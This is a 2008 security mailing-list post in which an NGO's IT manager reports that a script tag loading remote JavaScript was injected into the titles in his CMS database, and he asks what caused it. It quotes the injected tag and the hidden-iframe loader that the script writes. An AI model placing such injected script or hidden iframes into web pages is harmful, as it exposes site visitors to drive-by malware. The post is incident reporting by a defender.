Incidents
Mysterious JavaScript appearance in website database Apr 14 2008 11:03PM
Glenn Gillis (glenn elaw org test-google-a com)
On Sunday, 2008-April-13 at 01:07:38.030 UTC, the CMS database of the
U.S.-based NGO I work for mysteriously had a JavaScript URL appended to
the titles of much of the content on our website:

<script src=http://www.nihaorr1.com/1.js></script>

NB: the last modified dates for all of the content containing a
reference to this script are identical, right down the 1/100 second.

The contents of the script apparently attempts to open an iframe to a
non-existent domain, "nmidahena.com":

document.writeln("<iframe width=\'10\' height=\'1\'
src=\'http:\/\/www.nmidahena.com\/1.htm\'><\/iframe>");

I haven't found any reports of a new worm, etc. that might account for
this, but when I Google "nmidahena.com" I get over 100,000 hits for
other sites on which this script is present.

We are running a custom-developed CMS with MS-SQL Server 2000 as the
backend, on Windows NT Server 4.0 SP6a and IIS 4.0 (Yes, I know! The NT
Server is fully patched with whatever OS, IIS and SQL Server 2K hotfixes
released prior to NT4's end-of-life declaration by MS, for what it's worth.)

Anyone have an idea what might have caused this?
--
Thanks,

Glenn Gillis
ELAW U.S. Information Technology Manager
Environmental Law Alliance Worldwide

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus